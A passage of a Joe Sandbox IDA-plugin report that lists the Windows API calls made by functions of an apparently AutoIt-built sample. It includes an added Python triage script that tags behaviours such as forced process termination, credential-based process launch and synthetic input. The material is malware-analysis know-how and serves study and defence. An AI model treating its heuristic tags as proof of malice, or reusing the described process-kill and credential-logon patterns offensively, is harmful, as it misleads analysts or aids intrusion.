  • Part of subcall function 008112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0081134D
  • Part of subcall function 008112F3: SelectObject.GDI32(?,00000000), ref: 0081135C
  • Part of subcall function 008112F3: BeginPath.GDI32(?), ref: 00811373
  • Part of subcall function 008112F3: SelectObject.GDI32(?,00000000), ref: 0081139C
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0089C1C4
• LineTo.GDI32(00000000,00000003,?), ref: 0089C1D8
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0089C1E6
• LineTo.GDI32(00000000,00000000,?), ref: 0089C1F6
• EndPath.GDI32(00000000), ref: 0089C206
• StrokePath.GDI32(00000000), ref: 0089C216
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: bafdfe9886866bdbf6f3272bd8cb817f351e379c09d9803c3f7492ea0d6718aa
• Instruction ID: 68bc4b033b9d0b2c9a7942b044e138924c2735db154cdfe63d04024c66aca50d
• Opcode Fuzzy Hash: bafdfe9886866bdbf6f3272bd8cb817f351e379c09d9803c3f7492ea0d6718aa
• Instruction Fuzzy Hash: 8F11DE7640014DBFDF12AF94DC88EDA7FADFF08354F088022BA1996162D7719D55DBA0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 008303D3
• MapVirtualKeyW.USER32(00000010,00000000), ref: 008303DB
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 008303E6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 008303F1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 008303F9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00830401
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 335e123ba7b8e75858fdab6b7ac2943bcb7861d3402f14cf76f805f43ee720f9
• Instruction ID: 9d21894eefb98443197ae0069b92eb49199b5752c5233900262f14649bfb2923
• Opcode Fuzzy Hash: 335e123ba7b8e75858fdab6b7ac2943bcb7861d3402f14cf76f805f43ee720f9
• Instruction Fuzzy Hash: 3D016CB09017597DE3009F5A8C85B52FFB8FF19354F04411BA15C87942C7F5A864CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0087569B
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008756B1
• GetWindowThreadProcessId.USER32(?,?), ref: 008756C0
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008756CF
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008756D9
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008756E0
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 90fd57c252cd248e33ee087478f0c9ff344ba86bbdbc3c10846f99192d0f029d
• Instruction ID: 2ce9095159112378f98902601b0c48fcfb0a3b28bf2b77958caaed857853211f
• Opcode Fuzzy Hash: 90fd57c252cd248e33ee087478f0c9ff344ba86bbdbc3c10846f99192d0f029d
• Instruction Fuzzy Hash: E4F03032241258BBE7266BA2DC0DEEF7B7CFFD6B11F04016AFB05D1062D7A15A0186B5
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 008774E5
• EnterCriticalSection.KERNEL32(?,?,00821044,?,?), ref: 008774F6
• TerminateThread.KERNEL32(00000000,000001F6,?,00821044,?,?), ref: 00877503
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00821044,?,?), ref: 00877510
  • Part of subcall function 00876ED7: CloseHandle.KERNEL32(00000000,?,0087751D,?,00821044,?,?), ref: 00876EE1
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00877523
• LeaveCriticalSection.KERNEL32(?,?,00821044,?,?), ref: 0087752A
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: c0042aa12aa60854c8fe017ed09958ee82f6a06e4f412203264bd4099be945e7
• Instruction ID: 95d72a9690ee6ef5551057c108fdbffccce256b2d14a374fde102501676ac9ed
• Opcode Fuzzy Hash: c0042aa12aa60854c8fe017ed09958ee82f6a06e4f412203264bd4099be945e7
• Instruction Fuzzy Hash: F1F03A3A144612ABDB162BA4EC88AEA772AFF45302B180533F206D10A6DB756811CBA0
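The function blocks above are the raw output of the Joe Sandbox IDA plugin: for each function an ordered list of the API calls it makes (with the argument values the disassembler could resolve and the call-site address), the memory dump the function was read from, and the similarity hashes. Two of those sequences are worth picking out by hand when triaging a report of this size: the block ending at 008756E0, which posts WM_CLOSE (message 0x0010), retries it with SendMessageTimeoutW, then resolves the owning process, opens it with access mask 0x1F0FFF and calls TerminateProcess; and the block ending at 00868B8E, which builds an environment block and launches a process with CreateProcessWithLogonW, i.e. with explicit credentials. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses blocks in exactly this text format and applies a handful of triage rules to the API sequence. The tag names and the rules are this example's own heuristics, and the embedded sample is a constructed excerpt of three trimmed blocks in the report's format.

```python
"""Parse Joe Sandbox IDA-plugin function blocks and triage their API sequences.
Added example, not Joe Sandbox code; the tags in triage() are this example's own heuristics."""
import re

# One API line: optional "Part of subcall function XXXX:" prefix, Name.MODULE,
# optional "(args)" (args never contain ')'), then "ref: ADDRESS".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
SECTION_KEY = {"Memory Dump Source": "source", "Joe Sandbox IDA Plugin": "source",
               "Similarity": "similarity"}
WM_CLOSE = "00000010"            # 0x0010
PROCESS_ALL_ACCESS = "001F0FFF"  # classic 0x1F0FFF access mask

# Constructed excerpt in the report's format: three trimmed function blocks.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00868B2A
• OpenProcessToken.ADVAPI32(00000000), ref: 00868B31
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00868B40
• CloseHandle.KERNEL32(00000004), ref: 00868B4B
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00868B7A
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00868B8E
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0087569B
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008756B1
• GetWindowThreadProcessId.USER32(?,?), ref: 008756C0
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?), ref: 008756CF
• TerminateProcess.KERNEL32(00000000,00000000,?), ref: 008756D9
Similarity
• API String ID: 839392675-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00885134,?,?,00000000,00000001), ref: 008873BF
  • Part of subcall function 00883C94: GetWindowRect.USER32(?,?), ref: 00883CA7
• GetDesktopWindow.USER32 ref: 008873E9
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00887422
"""


def parse_blocks(text):
    """Split the report text into blocks; each block starts at an 'APIs' header."""
    blocks, block, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            block = {"apis": [], "source": {}, "similarity": {}}
            blocks.append(block)
            section = "APIs"
        elif line in SECTION_KEY:
            section = line
        elif block is not None and line.startswith("•"):
            if section == "APIs":
                m = API_RE.match(line)
                if m is None:
                    raise ValueError(f"unparsed API line: {line}")
                args = m.group("args")
                block["apis"].append({
                    "name": m.group("name"), "module": m.group("mod"),
                    "args": args.split(",") if args else [],
                    "ref": m.group("ref"), "subcall": m.group("sub")})
            else:  # "• Key: value" lines; the value may itself contain colons
                key, _, value = line[1:].strip().partition(":")
                block[SECTION_KEY[section]][key.strip()] = value.strip()
    return blocks


def _calls(block, name):
    return [a for a in block["apis"] if a["name"] == name]


def triage(block):
    """Sorted behaviour tags for one block; the rules are this example's own heuristics."""
    names = [a["name"] for a in block["apis"]]
    tags = set()
    if "CreateProcessWithLogonW" in names:
        tags.add("process-with-explicit-credentials")
    if "OpenProcess" in names and "TerminateProcess" in names:
        tags.add("forced-process-kill")
        # First OpenProcess argument is dwDesiredAccess.
        if any(c["args"][:1] == [PROCESS_ALL_ACCESS] for c in _calls(block, "OpenProcess")):
            tags.add("opens-with-PROCESS_ALL_ACCESS")
        # Second argument of PostMessageW / SendMessageTimeoutW is the message id.
        closes = _calls(block, "PostMessageW") + _calls(block, "SendMessageTimeoutW")
        if any(len(c["args"]) > 1 and c["args"][1] == WM_CLOSE for c in closes):
            tags.add("wm-close-before-kill")
    if "mouse_event" in names:
        tags.add("synthetic-mouse-input")
    if "TerminateThread" in names:
        tags.add("thread-termination")
    if names.count("MapVirtualKeyW") >= 2:
        tags.add("virtual-key-mapping")
    return sorted(tags)


def summarize(text):
    """One row per block: first call site, the report's API String ID, and tags."""
    return [{"ref": b["apis"][0]["ref"] if b["apis"] else None,
             "api_id": b["similarity"].get("API String ID", ""),
             "tags": triage(b)} for b in parse_blocks(text)]


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row["ref"], row["api_id"] or "-", ", ".join(row["tags"]) or "-")
```

Feeding the whole report text to summarize() gives one line per function with the tags that fired, which is a quicker way to find the process-kill, credential-logon and input-synthesis functions than reading every block. The rules key on argument positions, so they only work on lines where the disassembler resolved those arguments; a "?" in the relevant slot simply produces no tag, which is the safe direction for a triage aid.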
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00868E7F
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00868E8B
                                                            • CloseHandle.KERNEL32(?), ref: 00868E94
                                                            • CloseHandle.KERNEL32(?), ref: 00868E9C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00868EA5
                                                            • HeapFree.KERNEL32(00000000), ref: 00868EAC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: 9f068c5250fa2d2ba694491969b151c1e50a1186459603d288376f9800dbf2b7
                                                            • Instruction ID: 88826246157d0ad0e20ce83aa2d8895afecbb3bad2c49ab91ea978e84197c236
                                                            • Opcode Fuzzy Hash: 9f068c5250fa2d2ba694491969b151c1e50a1186459603d288376f9800dbf2b7
                                                            • Instruction Fuzzy Hash: 42E0C236004001FFDA062FF1EC0C90ABB69FB89322B288232F319C1171CB329420EB90
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00888928
                                                            • CharUpperBuffW.USER32(?,?), ref: 00888A37
                                                            • VariantClear.OLEAUT32(?), ref: 00888BAF
                                                              • Part of subcall function 00877804: VariantInit.OLEAUT32(00000000), ref: 00877844
                                                              • Part of subcall function 00877804: VariantCopy.OLEAUT32(00000000,?), ref: 0087784D
                                                              • Part of subcall function 00877804: VariantClear.OLEAUT32(00000000), ref: 00877859
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 123d927bf0c704ca493f3d5b97157ebb850318c94e1a073739750b54ee0eacfe
                                                            • Instruction ID: eedbcb63c92d546a53e75e664f082e5b194b71670401d84f8e7e87ba923edd81
                                                            • Opcode Fuzzy Hash: 123d927bf0c704ca493f3d5b97157ebb850318c94e1a073739750b54ee0eacfe
                                                            • Instruction Fuzzy Hash: 5C913871608305DFC714EF28C58496ABBE8FF89354F04496EF89ACB262DB31E945CB52
                                                            APIs
                                                              • Part of subcall function 0082FEC6: _wcscpy.LIBCMT ref: 0082FEE9
                                                            • _memset.LIBCMT ref: 00873077
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008730A6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00873159
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00873187
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 03cfb7e277718d4c9ba0eb307fa842e9f6f38afdb5e718cda556846f00a3971c
                                                            • Instruction ID: 47183c19d05627281d29e84b935b8f67138be089b1ee3eb506eedc84325d3aac
                                                            • Opcode Fuzzy Hash: 03cfb7e277718d4c9ba0eb307fa842e9f6f38afdb5e718cda556846f00a3971c
                                                            • Instruction Fuzzy Hash: 5851E3316083009FD7259F28C845A6BB7E8FF95314F448A2EF899D3295DB70CE44A7A3
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0086DAC5
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0086DAFB
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0086DB0C
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0086DB8E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 753597075-1075368562
                                                            • Opcode ID: d227cd7630bf9fb0279239921441d682718aada1ce0c319714a1267616311cd4
                                                            • Instruction ID: eb48945cb4d22c940a0b111885b003d3eca1273fd83328ceb238e74bfa9163a9
                                                            • Opcode Fuzzy Hash: d227cd7630bf9fb0279239921441d682718aada1ce0c319714a1267616311cd4
                                                            • Instruction Fuzzy Hash: FB417171A00309DFDB15DF54D884A9A7BB9FF85360F1680AAAD05DF20AD7B1D944CBA0
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872CAF
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00872CCB
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00872D11
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008D6890,00000000), ref: 00872D5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 98152a5ed2be9c399c131e45497c08d31170b91be2d9c2b83d3a37215727b7e8
                                                            • Instruction ID: e1d94f1f828f1e558ccc0c88909bb4aa438f1b8b194ac34a9421089f0454d371
                                                            • Opcode Fuzzy Hash: 98152a5ed2be9c399c131e45497c08d31170b91be2d9c2b83d3a37215727b7e8
                                                            • Instruction Fuzzy Hash: 4E4191302053059FD724DF28C885B5ABBE8FF85320F14866EF969D7295D770E904CB92
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0088DAD9
                                                              • Part of subcall function 008179AB: _memmove.LIBCMT ref: 008179F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: 8b34d42a0261c73912c9cd8018a0afe6a3951fa4abaada0015c1fa8a3bfbd617
                                                            • Instruction ID: f40b1fc9eb6d69f901f0497829e00bfd399bf4b6ade7c23c9fa4058bc9c93e7b
                                                            • Opcode Fuzzy Hash: 8b34d42a0261c73912c9cd8018a0afe6a3951fa4abaada0015c1fa8a3bfbd617
                                                            • Instruction Fuzzy Hash: 93317070500619ABCF10EF98C8919EEB3B9FF55320B108A69E865E76D1DB31E906CB81
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008693F6
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00869409
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00869439
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: ba2e3fb541277d37590f7734750eeaddfb7a26c09b3afa2156cb8769f36c369c
                                                            • Instruction ID: ebbfadcdf0d8ba33865b5b886e7baa25db56da7d4dc16925058abb53cb67daac
                                                            • Opcode Fuzzy Hash: ba2e3fb541277d37590f7734750eeaddfb7a26c09b3afa2156cb8769f36c369c
                                                            • Instruction Fuzzy Hash: 1F210471A00108BADB18ABB8DC85DFFB77CFF45310B154119F965D72E1DF38494A9611
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00881B40
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00881B66
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00881B96
                                                            • InternetCloseHandle.WININET(00000000), ref: 00881BDD
                                                              • Part of subcall function 00882777: GetLastError.KERNEL32(?,?,00881B0B,00000000,00000000,00000001), ref: 0088278C
                                                              • Part of subcall function 00882777: SetEvent.KERNEL32(?,?,00881B0B,00000000,00000000,00000001), ref: 008827A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: f8e6340531e819c9beaf7172b52b156aca3e790e15e80b0eb9be0ac2c2ef3baa
                                                            • Instruction ID: a07f6a440f6445bf043c92109ee805f0c496d25f4d8036fc9f5c75d8bbdd8a17
                                                            • Opcode Fuzzy Hash: f8e6340531e819c9beaf7172b52b156aca3e790e15e80b0eb9be0ac2c2ef3baa
                                                            • Instruction Fuzzy Hash: CD219FB1500208BFEB11BF659CC9EBF77ECFB49758F10412AF505E6241EE209D069761
                                                            APIs
                                                              • Part of subcall function 00811D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00811D73
                                                              • Part of subcall function 00811D35: GetStockObject.GDI32(00000011), ref: 00811D87
                                                              • Part of subcall function 00811D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00811D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008966D0
                                                            • LoadLibraryW.KERNEL32(?), ref: 008966D7
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008966EC
                                                            • DestroyWindow.USER32(?), ref: 008966F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 4d16260d770fda5a1d0bcc7ece62e4daadf03db58bee686193d3cb906cc030c5
                                                            • Instruction ID: 5ba279d790ae4f270b0598c32413e5647da92a08c2e86ea029fa1d32a482175d
